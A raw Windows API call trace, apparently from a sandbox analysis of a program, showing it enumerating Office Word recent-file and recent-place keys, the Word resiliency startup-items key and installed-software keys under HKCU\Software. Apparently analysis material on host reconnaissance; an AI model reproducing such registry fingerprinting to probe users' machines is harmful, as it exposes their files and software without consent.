[0086.169] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.169] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x2baf50)
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.170] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.170] CoTaskMemFree (pv=0x2baf50)
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.170] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.170] CoTaskMemFree (pv=0x2baf50)
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] RegOpenKeyExW (in: hKey=0x410, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x40c) returned 0x0
[0086.170] RegCloseKey (hKey=0x410) returned 0x0
[0086.170] RegQueryInfoKeyW (in: hKey=0x40c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.170] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File MRU", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.170] CoTaskMemFree (pv=0x2baf50)
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.170] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Options", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.170] CoTaskMemFree (pv=0x2baf50)
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.170] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Place MRU", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.170] CoTaskMemFree (pv=0x2baf50)
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x0) returned 0x2
[0086.170] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.170] CoTaskMemFree (pv=0x0)
[0086.170] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.170] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.171] CoTaskMemFree (pv=0x2baf50)
[0086.171] CoTaskMemFree (pv=0x0)
[0086.171] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.171] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.172] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.172] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x410) returned 0x0
[0086.172] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.172] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.172] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.172] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.172] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.172] CoTaskMemFree (pv=0x0)
[0086.172] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.172] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.172] CoTaskMemFree (pv=0x2baf50)
[0086.173] CoTaskMemFree (pv=0x0)
[0086.173] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] CoTaskMemFree (pv=0x2baf50)
[0086.173] CoTaskMemFree (pv=0x0)
[0086.173] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] CoTaskMemFree (pv=0x2baf50)
[0086.173] CoTaskMemFree (pv=0x0)
[0086.173] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] CoTaskMemFree (pv=0x2baf50)
[0086.173] CoTaskMemFree (pv=0x0)
[0086.173] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] CoTaskMemFree (pv=0x2baf50)
[0086.173] CoTaskMemFree (pv=0x0)
[0086.173] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] CoTaskMemFree (pv=0x2baf50)
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.173] RegOpenKeyExW (in: hKey=0x410, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x414) returned 0x0
[0086.174] RegCloseKey (hKey=0x410) returned 0x0
[0086.174] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.174] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="GDIPlus", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xe, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IAM", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xf, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IME", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x10, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IMEJP", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x11, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Connection Wizard", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x12, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x13, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Mail and News", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x14, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Java VM", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x15, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x16, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MediaPlayer", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x17, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft Management Console", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x18, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MS Design Tools", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
